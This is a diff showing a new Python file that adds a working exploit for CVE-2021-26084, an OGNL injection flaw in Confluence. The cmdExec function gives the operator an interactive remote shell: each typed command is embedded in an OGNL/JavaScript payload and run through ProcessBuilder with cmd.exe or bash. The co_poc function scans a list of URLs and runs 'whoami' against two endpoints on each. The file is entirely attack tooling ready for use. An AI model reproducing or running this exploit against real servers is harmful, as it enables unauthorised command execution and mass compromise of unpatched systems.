■ ■ ■ ■ ■ ■
CVE-2021-26084_Confluence_OGNLInjection.py
| 1 | + | #!/usr/bin/python3 |
| 2 | + | import requests |
| 3 | + | import optparse |
| 4 | + | from bs4 import BeautifulSoup |
| 5 | + | import optparse |
| 6 | + | from requests.packages import urllib3 |
| 7 | + | urllib3.disable_warnings() |
| 8 | + | |
| 9 | + | parser = optparse.OptionParser() |
| 10 | + | parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com") |
| 11 | + | parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x", default="/pages/createpage-entervariables.action?SpaceKey=x") |
| 12 | + | parser.add_option('-r', '--read_file', action="store", dest="file", help="Base target host file") |
| 13 | + | |
| 14 | + | options, args = parser.parse_args() |
| 15 | + | session = requests.Session() |
| 16 | + | url_vuln = options.url |
| 17 | + | endpoint = options.path |
| 18 | + | file = options.file |
| 19 | + | |
| 20 | + | if not options.url and not file: |
| 21 | + | |
| 22 | + | print('[+] Specify an url target') |
| 23 | + | print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x') |
| 24 | + | print('[+] Example usage: exploit.py -r xxx.txt') |
| 25 | + | print('[+] Example help usage: exploit.py -h') |
| 26 | + | exit() |
| 27 | + | |
| 28 | + | def cmdExec(): |
| 29 | + | |
| 30 | + | while True: |
| 31 | + | |
| 32 | + | cmd = input('> ') |
| 33 | + | |
| 34 | + | xpl_url = url_vuln + endpoint |
| 35 | + | xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", |
| 36 | + | "Connection": "close", |
| 37 | + | "Content-Type": "application/x-www-form-urlencoded", |
| 38 | + | "Accept-Encoding": "gzip, deflate"} |
| 39 | + | xpl_data = {"queryString": "aaaaassssssssssaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"} |
| 40 | + | rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data, verify=False) |
| 41 | + | |
| 42 | + | soup = BeautifulSoup(rawHTML.text, 'html.parser') |
| 43 | + | queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] |
| 44 | + | print(queryStringValue) |
| 45 | + | |
| 46 | + | def co_poc(): |
| 47 | + | cmd = 'whoami' |
| 48 | + | for line in open(file): |
| 49 | + | url_vuln=line.strip() |
| 50 | + | if '://' not in url_vuln: |
| 51 | + | url_vuln = 'http://' + url_vuln |
| 52 | + | if not url_vuln.endswith('/'): |
| 53 | + | url_vuln = url_vuln + "/" |
| 54 | + | xpl_url = url_vuln +'pages/doenterpagevariables.action' |
| 55 | + | xpl_url2 = url_vuln + 'pages/createpage-entervariables.action' |
| 56 | + | xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", |
| 57 | + | "Connection": "close", |
| 58 | + | "Content-Type": "application/x-www-form-urlencoded", |
| 59 | + | "Accept-Encoding": "gzip, deflate"} |
| 60 | + | xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"} |
| 61 | + | rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data, verify=False) |
| 62 | + | rawHTML2 = session.post(xpl_url2, headers=xpl_headers, data=xpl_data, verify=False) |
| 63 | + | soup = BeautifulSoup(rawHTML.text, 'html.parser') |
| 64 | + | soup2 = BeautifulSoup(rawHTML2.text, 'html.parser') |
| 65 | + | try: |
| 66 | + | queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] |
| 67 | + | if 'aaaaaaaa[' in queryStringValue: |
| 68 | + | print('[+] This url is Vulnerable '+xpl_url) |
| 69 | + | queryStringValue = soup2.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] |
| 70 | + | if 'aaaaaaaa[' in queryStringValue: |
| 71 | + | print('[+] This url is Vulnerable '+xpl_url2) |
| 72 | + | if 'aaaaaaaa[' not in queryStringValue: |
| 73 | + | print('[-] This url is not Vulnerable '+xpl_url) |
| 74 | + | except: |
| 75 | + | print('[-] This url is not Vulnerable '+xpl_url) |
| 76 | + | |
| 77 | + | if __name__ == "__main__": |
| 78 | + | if options.url: |
| 79 | + | cmdExec() |
| 80 | + | if file: |
| 81 | + | co_poc() |
| 82 | + | |
| 83 | + | |
| 84 | + | |
| 85 | + | |
| 86 | + | |